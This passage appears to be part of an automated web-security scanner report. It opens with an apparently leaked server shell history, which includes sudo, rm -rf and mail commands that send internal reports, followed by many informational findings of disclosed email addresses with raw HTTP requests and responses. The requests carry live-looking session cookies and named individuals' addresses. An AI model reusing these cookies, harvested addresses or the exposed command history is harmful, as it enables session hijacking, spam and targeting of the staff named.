php ~/www/reporting/allreports/run_yesterday_report.php
uuencode ~/www/reporting/allreports/allreports.csv ~/www/reporting/allreports/allreports.csv | mail -s "Advertiser Report" "roxane@nextadvisor.com"
cd www/reporting/allreports/
ls -al
crontab -e
ls -al
crontab -e
vi run_yesterday_report.php
cd ../cj
ls
ls -al
q!
cd ../allreports/
php run_yesterday_report.php
ls -al
cat allreports.csv |more
crontab -e
ls -al
ls -al
crontab -e
uuencode ~/www/reporting/allreports/allreports.csv ~/www/reporting/allreports/allreports.csv | mail -s "Advertiser Report" "angelo@nextadvisor.com, lucie@nextadvisor.com, roxane@nextadvisor.com"
crontab -e
cd ../idguard/
ls -al
vi index.php
crontab -e
vi ../allreports/run_yesterday_report.php
ls -al
vi ../allreports/run_yesterday_report.php
ls -al
ls -al
ls -al
ls -al
rm test.csv
ls -al
rm
...[SNIP]...
al
php ~/www/reporting/allreports/run_yesterday_report.php
ls -al
crontab -e
uuencode ~/www/reporting/allreports/allreports.csv ~/www/reporting/allreports/allreports.csv | mail -s "Advertiser Report" "angelo@nextadvisor.com, lucie@nextadvisor.com, roxane@nextadvisor.com"
cd
cd /usr/local/apache/sites/jsp-test
pwd
ls -al
cd jsp-test
ls
vi PageFour.jsp
cd ..
cp PageFour.jsp jsp-test/
sudo su
cd www/reporting/
cd allreports/
ls -al
crontab -e
crontab -e
cd www
ls -al
l
...[SNIP]...
llreports/
mail
cat allreports.csv |more
crontab -e
uuencode /home/roxane/www/reporting/allreports/allreports.csv /home/roxane/www/reporting/allreports/allreports.csv | mail -s "Advertiser Report" "an
gelo@nextadvisor.com, lucie@nextadvisor.com, roxane@nextadvisor.com"
uuencode /home/roxane/www/reporting/allreports/allreports.csv /home/roxane/www/reporting/allreports/allreports.csv | mail -s "Advertiser Report" "angelo@nextadvisor.com, lucie@nextadvisor.com, roxane@nextadvisor.com"
ls -al
ls -al
ls -al
ls -al
ls -al
ls -al
ls -al
ls -al
ls -al
ls -al
ls -al
ls -al
ls -al
ls -al
crontab -e
php run_yesterday_report.php
cd ../onenetworkdirect/
ls -al
cat ond.csv
cd ../experian/
l
...[SNIP]...

crontab -e
ls -al
cat allreports.csv |more
crontab -e
uuencode /home/roxane/www/reporting/allreports/allreports.csv /home/roxane/www/reporting/allreports/allreports.csv | mail -s "Advertiser Report" "angelo@nextadvisor.com, lucie@nextadvisor.com, roxane@nextadvisor.com"
crontab -e
ls -al
crontab -e
ls -al
ls -al
ls -al
crontab -e
crontab -e
crontab -e
crontab -e
date
cd www/reporting/allreports/
ls -al
cat allreports.csv |more
cd ../cj
ls
ls -al
crontab -e
ls -al
cr
...[SNIP]...
porting/allreports/run_yesterday_report.php
crontab -e
uuencode /home/roxane/www/reporting/allreports/allreports.csv /home/roxane/www/reporting/allreports/allreports.csv | mail -s "Advertiser Report" "angelo@nextadvisor.com, lucie@nextadvisor.com, roxane@nextadvisor.com"
ls-al
ls -al
cd www/reporting
cd allreports/
ls
cat allreports.csv |more
crontab -e
crontab -e
date
crontab -e
crontab -e
exit
crontab -e
cd /usr/local/apache
cd sites/jsp-test
ls -al
rm -rf jsp-test
...[SNIP]...

26.90. http://www.onlinereputationmanager.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlinereputationmanager.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET /?gclid=CKqyh-O1tqgCFQbc4AodP0FlBA HTTP/1.1
Host: www.onlinereputationmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 33474
Content-Type: text/html
Content-Location: http://www.onlinereputationmanager.com/Index.html
Last-Modified: Tue, 01 Mar 2011 07:10:40 GMT
Accept-Ranges: bytes
ETag: "adac3c6dfd7cb1:11bf65"
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 00:35:18 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>
...[SNIP]...
<a href="mailto:sales@onlinereputationmanager.com">
...[SNIP]...

26.91. http://www.onlinereputationmanager.com/script/jsvalidations.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlinereputationmanager.com
Path:   /script/jsvalidations.js

Issue detail

The following email address was disclosed in the response:

Request

GET /script/jsvalidations.js HTTP/1.1
Host: www.onlinereputationmanager.com
Proxy-Connection: keep-alive
Referer: http://www.onlinereputationmanager.com/?gclid=CKqyh-O1tqgCFQbc4AodP0FlBA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 11301
Content-Type: application/x-javascript
Last-Modified: Wed, 24 Jun 2009 08:10:25 GMT
Accept-Ranges: bytes
ETag: "4087903aa3f4c91:11bf65"
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 00:33:51 GMT


//**************************************************************************
// To chk which explorer client has

var isNS4 = (navigator.appName=="Netscape")?1:0;

function chkKeypress(evt)    //c
...[SNIP]...
string represents an atom (basically a series of non-special characters.) */
       var atom=validChars + '+';

       /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
       var word="(" + atom + "|" + quotedUser + ")";

       // The following pattern describes the structure of the user
...[SNIP]...

26.92. http://www.oracle.com/webapps/dialogue/ns/form.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /webapps/dialogue/ns/form.js

Issue detail

The following email address was disclosed in the response:

Request

GET /webapps/dialogue/ns/form.js HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp?p_ext=Y&p_dlg_id=8834744&src=7054579&Act=9&sckw=WWMK10058753MPP001.GCM.8100.110
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=f849cf7b1f502ad14b1bf721ba3ccbe219e176127d3d1d3c633a46aef659a3f2.e3yTa3qTahyRe3uRb3aSchyTby0; BIGipServermktap-dialogue_http_pool=252547725.57095.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Last-Modified: Fri, 15 Apr 2011 04:08:55 GMT
Accept-Ranges: bytes
Content-Length: 6212
Content-Type: application/x-javascript
Date: Sun, 24 Apr 2011 19:44:05 GMT
Connection: close


var defaultEmptyOK = true;

// decimal point character differs by language and culture
var decimalPointDelimiter = ".";

// isSignedFloat (STRING s [, BOOLEAN emptyOK])
//
// True if string
...[SNIP]...
ngs
// ii) this is a positive, not negative, number

return (isSignedInteger(s, secondArg)
&& ( (isEmpty(s) && secondArg) || (parseInt (s) > 0) ) );
}

// added by Anila -- anila.penmatcha@oracle.com

// BOI, followed by one or more characters, followed by @,
// followed by one or more characters, followed by .,
// followed by one or more characters, followed by EOI.
var reEmail = /^.+\@.+\.
...[SNIP]...

26.93. http://www.oracle.com/webfolder/emktg/global/dlgreglet.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /webfolder/emktg/global/dlgreglet.js

Issue detail

The following email address was disclosed in the response:

Request

GET /webfolder/emktg/global/dlgreglet.js HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp?p_ext=Y&p_dlg_id=8834744&src=7054579&Act=9&sckw=WWMK10058753MPP001.GCM.8100.110
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServermktap-dialogue_http_pool=252547725.57095.0000

Response

HTTP/1.1 200 OK
Content-Type: Application/js
Content-Disposition: inline;filename="dlgreglet.js"
X-Pad: avoid browser bug
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=139;ecid=130907166434141441,0)
Content-Length: 14600
Date: Sun, 24 Apr 2011 19:44:05 GMT
Connection: close

<!-- r.File_Category = "" (Marc:2)-->
// 6/15/2002 john.burbridge@oracle.com moved checkCMP from lib.js to reglet.js

// MW: minor change to use the "uname" variable
//sajnavi: Added for SSO Project
var uname = "";

if (libjsLoad) {
   readInfoCookie();
   uname = getName(
...[SNIP]...

26.94. http://www.oracle.com/webfolder/emktg/global/navtree2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /webfolder/emktg/global/navtree2.js

Issue detail

The following email address was disclosed in the response:

Request

GET /webfolder/emktg/global/navtree2.js HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp?p_ext=Y&p_dlg_id=8834744&src=7054579&Act=9&sckw=WWMK10058753MPP001.GCM.8100.110
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServermktap-dialogue_http_pool=252547725.57095.0000

Response

HTTP/1.1 200 OK
Content-Type: Application/js
Content-Disposition: inline;filename="navtree2.js"
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=139;ecid=130929852452443172,0)
Content-Length: 22669
Date: Sun, 24 Apr 2011 19:44:06 GMT
Connection: close

// Title: COOLjsTreePRO
// URL: http://javascript.cooldev.com/scripts/cooltreepro/
// Version: 2.3.1
// Last Modify: 02 Apr 2003
// Author: Sergey Nosenko <darknos@cooldev.com>
// Notes: Registra
...[SNIP]...

26.95. http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code_landingpads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracleimg.com
Path:   /ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code_landingpads.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code_landingpads.js HTTP/1.1
Host: www.oracleimg.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp?p_ext=Y&p_dlg_id=8834744&src=7054579&Act=9&sckw=WWMK10058753MPP001.GCM.8100.110
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 28 Jan 2011 10:48:22 GMT
ETag: "31d937-7a7b-49ae5ce0d2980"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (G;max-age=300+0;age=0;ecid=327044933151424612,0)
Content-Length: 31355
Date: Sun, 24 Apr 2011 19:44:07 GMT
Connection: close

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

26.96. https://www.pcisecuritystandards.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pcisecuritystandards.org
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.pcisecuritystandards.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:27:56 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="mailto:electionsupport@pcisecuritystandards.org">
...[SNIP]...

26.97. https://www.pcisecuritystandards.org/js/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pcisecuritystandards.org
Path:   /js/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery.cookie.js HTTP/1.1
Host: www.pcisecuritystandards.org
Connection: keep-alive
Referer: https://www.pcisecuritystandards.org/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:27:56 GMT
Server: Apache
Last-Modified: Tue, 03 Aug 2010 14:34:22 GMT
ETag: "35b17a-1096-48cec36899780"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/x-javascript
Content-Length: 4246

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

26.98. http://www.pcworld.com/script/jqModal.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /script/jqModal.js

Issue detail

The following email address was disclosed in the response:

Request

GET /script/jqModal.js HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205278865.1910705707.1303674274.1303674274.1303674274.1; __utmb=205278865; __utmc=205278865; __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); pcw.last_uri=/article/149142/identity_theft_monitoring_services_called_waste.html; fsr.a=1303674274598

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:44:23 GMT
Server: Apache
X-GasHost: gas2
X-Cooking-With: Gasoline-Local
X-Gasoline-Age: 343
Last-Modified: Mon, 11 Apr 2011 16:58:54 GMT
Etag: W/"3355-1302541134000"
Content-Type: text/javascript
Vary: Accept-Encoding
Content-Length: 3355

/*
* jqModal - Minimalist Modaling with jQuery
* (http://dev.iceburg.net/jquery/jqModal/)
*
* Copyright (c) 2007,2008 Brice Burgess <bhb@iceburg.net>
* Dual licensed under the MIT and GPL licen
...[SNIP]...

26.99. http://www.positivesearchresults.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.positivesearchresults.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET /?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw HTTP/1.1
Host: www.positivesearchresults.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:30 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: bbd55d5d7e98372b0a401649530373ff=48b1be1e8ff193660268fe947051d30b; path=/
Last-Modified: Mon, 25 Apr 2011 00:32:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 24645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=
...[SNIP]...
<a href="mailto:info@positivesearchresults.com?subject=Positive%20Searches%20Info">info@positivesearchresults.com</a>
...[SNIP]...

26.100. http://www.positivesearchresults.com/templates/gk_corporate/css/gk_stuff.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.positivesearchresults.com
Path:   /templates/gk_corporate/css/gk_stuff.css

Issue detail

The following email address was disclosed in the response:

Request

GET /templates/gk_corporate/css/gk_stuff.css HTTP/1.1
Host: www.positivesearchresults.com
Proxy-Connection: keep-alive
Referer: http://www.positivesearchresults.com/?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbd55d5d7e98372b0a401649530373ff=5e1d086ddffa92bea8c641966a14494e; __utmx=35867937.; __utmxx=35867937.; __utmx_k_76107852=1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:32 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 18 Jun 2010 01:52:20 GMT
ETag: "c5d02b9-11cc-4894436063300"
Accept-Ranges: bytes
Content-Length: 4556
Content-Type: text/css

/*--------------------------------------------------------------
# Corporate - April 2009 (for Joomla 1.5)
# Copyright (C) 2007-2009 Gavick.com. All Rights Reserved.
# License: Copyrighted Commercial Software
# Website: http://www.gavick.com
# Support: support@gavick.com
---------------------------------------------------------------*/
   
/* Image Show Module for Photoslide
--------------------------------------------------------------------------------*/

div.gk_is
...[SNIP]...

26.101. http://www.positivesearchresults.com/templates/gk_corporate/css/joomla_classes.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.positivesearchresults.com
Path:   /templates/gk_corporate/css/joomla_classes.css

Issue detail

The following email address was disclosed in the response:

Request

GET /templates/gk_corporate/css/joomla_classes.css HTTP/1.1
Host: www.positivesearchresults.com
Proxy-Connection: keep-alive
Referer: http://www.positivesearchresults.com/?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbd55d5d7e98372b0a401649530373ff=5e1d086ddffa92bea8c641966a14494e; __utmx=35867937.; __utmxx=35867937.; __utmx_k_76107852=1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:32 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 18 Jun 2010 01:52:20 GMT
ETag: "c5d02b0-14d5-4894436063300"
Accept-Ranges: bytes
Content-Length: 5333
Content-Type: text/css

/*--------------------------------------------------------------
# Corporate - April 2009 (for Joomla 1.5)
# Copyright (C) 2007-2009 Gavick.com. All Rights Reserved.
# License: Copyrighted Commercial Software
# Website: http://www.gavick.com
# Support: support@gavick.com
---------------------------------------------------------------*/

/* Joomla style
--------------------------------------------------------- */
.article_separator{
   clear:both;
   display:block;
   heig
...[SNIP]...

26.102. http://www.positivesearchresults.com/templates/gk_corporate/css/style2.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.positivesearchresults.com
Path:   /templates/gk_corporate/css/style2.css

Issue detail

The following email address was disclosed in the response:

Request

GET /templates/gk_corporate/css/style2.css HTTP/1.1
Host: www.positivesearchresults.com
Proxy-Connection: keep-alive
Referer: http://www.positivesearchresults.com/?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbd55d5d7e98372b0a401649530373ff=5e1d086ddffa92bea8c641966a14494e; __utmx=35867937.; __utmxx=35867937.; __utmx_k_76107852=1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:32 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 18 Jun 2010 01:52:20 GMT
ETag: "c5d02af-2b68-4894436063300"
Accept-Ranges: bytes
Content-Length: 11112
Content-Type: text/css

/*--------------------------------------------------------------
# Corporate - April 2009 (for Joomla 1.5)
# Copyright (C) 2007-2009 Gavick.com. All Rights Reserved.
# License: Copyrighted Commercial Software
# Website: http://www.gavick.com
# Support: support@gavick.com
---------------------------------------------------------------*/

/* ------------------------- STYLE2 --------------------------*/

/* template_css.css
---------------------------------------------
...[SNIP]...

26.103. http://www.positivesearchresults.com/templates/gk_corporate/css/suckerfish.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.positivesearchresults.com
Path:   /templates/gk_corporate/css/suckerfish.css

Issue detail

The following email address was disclosed in the response:

Request

GET /templates/gk_corporate/css/suckerfish.css HTTP/1.1
Host: www.positivesearchresults.com
Proxy-Connection: keep-alive
Referer: http://www.positivesearchresults.com/?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbd55d5d7e98372b0a401649530373ff=5e1d086ddffa92bea8c641966a14494e; __utmx=35867937.; __utmxx=35867937.; __utmx_k_76107852=1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:31 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 18 Jun 2010 01:52:20 GMT
ETag: "c5d02ba-8a3-4894436063300"
Accept-Ranges: bytes
Content-Length: 2211
Content-Type: text/css

/*--------------------------------------------------------------
# Corporate - April 2009 (for Joomla 1.5)
# Copyright (C) 2007-2009 Gavick.com. All Rights Reserved.
# License: Copyrighted Commercial Software
# Website: http://www.gavick.com
# Support: support@gavick.com
---------------------------------------------------------------*/

/* Box-model
------------------------------------------------------------*/

div#horiz-menu,
div#horiz-menu *{
   margin:0;
   padding:
...[SNIP]...

26.104. http://www.positivesearchresults.com/templates/gk_corporate/css/template_css.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.positivesearchresults.com
Path:   /templates/gk_corporate/css/template_css.css

Issue detail

The following email address was disclosed in the response:

Request

GET /templates/gk_corporate/css/template_css.css HTTP/1.1
Host: www.positivesearchresults.com
Proxy-Connection: keep-alive
Referer: http://www.positivesearchresults.com/?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbd55d5d7e98372b0a401649530373ff=5e1d086ddffa92bea8c641966a14494e; __utmx=35867937.; __utmxx=35867937.; __utmx_k_76107852=1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:31 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 24 Mar 2011 07:02:57 GMT
ETag: "c5d02b1-3e63-49f351299e040"
Accept-Ranges: bytes
Content-Length: 15971
Content-Type: text/css

/*--------------------------------------------------------------
# Corporate - April 2009 (for Joomla 1.5)
# Copyright (C) 2007-2009 Gavick.com. All Rights Reserved.
# License: Copyrighted Commercial Software
# Website: http://www.gavick.com
# Support: support@gavick.com
---------------------------------------------------------------*/
   
/* universal set of reset styles
---------------------------------------------------------------*/
html,body,div,span,applet,objec
...[SNIP]...

26.105. http://www.positivesearchresults.com/templates/gk_corporate/css/typography.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.positivesearchresults.com
Path:   /templates/gk_corporate/css/typography.css

Issue detail

The following email address was disclosed in the response:

Request

GET /templates/gk_corporate/css/typography.css HTTP/1.1
Host: www.positivesearchresults.com
Proxy-Connection: keep-alive
